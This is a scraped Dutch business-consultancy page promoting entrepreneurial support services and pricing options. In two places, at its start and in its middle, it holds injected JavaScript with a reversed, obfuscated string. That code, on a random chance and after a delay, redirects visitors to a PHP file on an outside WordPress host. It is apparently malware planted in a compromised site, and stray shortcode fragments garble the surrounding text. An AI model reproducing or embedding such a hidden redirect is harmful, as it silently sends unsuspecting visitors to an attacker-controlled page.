) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}top_padding=”40″ bottom_padding=”40″]

KLINKT DIT U BEKEND IN DE OREN ?

Wilt u dat de hele wereld uw diensten kent, maar weet u niet waar u moet beginnen?
Hebt u hulp nodig om uw onderneming te ontwikkelen en te doen groeien?
Wilt u bepaalde marktsegmenten veroveren, contacten leggen met mogelijke klanten of uw bestaande klanten behouden? Ja, maar hoe dan?
Hebt u het druk en komt u tijd te kort? Hebt u punctuele en doeltreffende assistentie nodig.

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}top_padding=”30″]

DAN IS QUITE DIFFERENT IETS VOOR U

«We zijn ondernemers in hart en ziel. We kennen het reilen en zeilen van kleine bedrijfjes, maar ook de succesformules van grote ondernemingen hebben voor ons geen geheimen.»

INSPIRATIE EN TOEWIJDING, DAT IS ESSENTIEEL

Aan motivatie geen gebrek, en aan praktisch denken evenmin. We bieden u talloze nuttige ideeën om u te helpen uw bedrijf en uw projecten ten volle te ontwikkelen (nee hoor, op onze ideeën staat geen rem!)
In alle eenvoud, geen blabla, geen poespas!

KENNIS EN ERVARING VOOROP

Een rechterhand op wie u kunt rekenen, is dat niet precies wat u zoekt?

Dankzij ons staat u direct in contact met een ervaren, gemotiveerde en efficiënte medewerker.

DAAR WAAR U HET NODIG HEBT, WANNEER U HET NODIG HEBT

We zijn de brandstof die u nodig hebt. Op zoek naar de juiste strategie? Nieuwe oplossingen? Ondersteuning? Geen brug is ons te ver, en we houden rekening met uw resources, middelen en bedrijfscultuur.

VEEL HANDEN MAKEN LICHT WERK

We werken met u en uw team. Indien nodig doen we een beroep op doorgewinterde specialisten en bespreken we samen welke oplossingen het meest geschikt zijn voor uw verzoek.

Uw bedrijf kan de vruchten plukken van het netwerk waarover we beschikken.

ONZE MANIER VAN WERKEN: AFGESTEMD OP UW ONDERNEMING

We helpen u bij dringende projecten of langetermijnplannen, in samenwerking met uw team of met het onze. Eindeloos palaveren is verleden tijd: we luisteren naar uw verhaal en leggen u op een eerlijke, transparante en directe manier de oplossingen voor.

tooltip_mini_box” style=”position: absolute; left: 165px; top: 35px; opacity: 0.55;”>

UUR OF DAGTARIEF, OP BASIS VAN DE BESTEDE TIJD
We werken met u volgens uw behoeften en instructies, voor de uitwerking van een specifiek project, de ondersteuning van een team enz.

Doordat we per uur of per dag werken is deze formule erg flexibel en transparant. Ze is bovendien gebaseerd op het overzicht van de prestaties, binnen de grenzen van uw budget.

EEN INSPANNING VOOR BEGINNENDE ONDERNEMERS
Het parcours van een startende onderneming is complex en zit vol valkuilen, dat weten wij maar al te goed.

Om uw slaagkansen te verhogen, gaan we recht op uw doel af: we bieden u de geknipte oplossingen die uw onderneming levensvatbaar maken en uw project een meerwaarde bieden, en dit aan een vaste en forfaitaire kost.

tooltip_mini_box” style=”position: absolute; left: 136px; top: 167px; opacity: 0.2;”>

EEN PRIJS WAARIN ALLES INBEGREPEN ZIT, ZONDER NARE VERRASSINGEN
We baseren ons op een taak, een werkgebied, studie of analyse, de resultaten die u verwacht en de deadline die u ons oplegt. Daarvoor vragen wij een forfaitaire vergoeding die binnen uw budget blijft.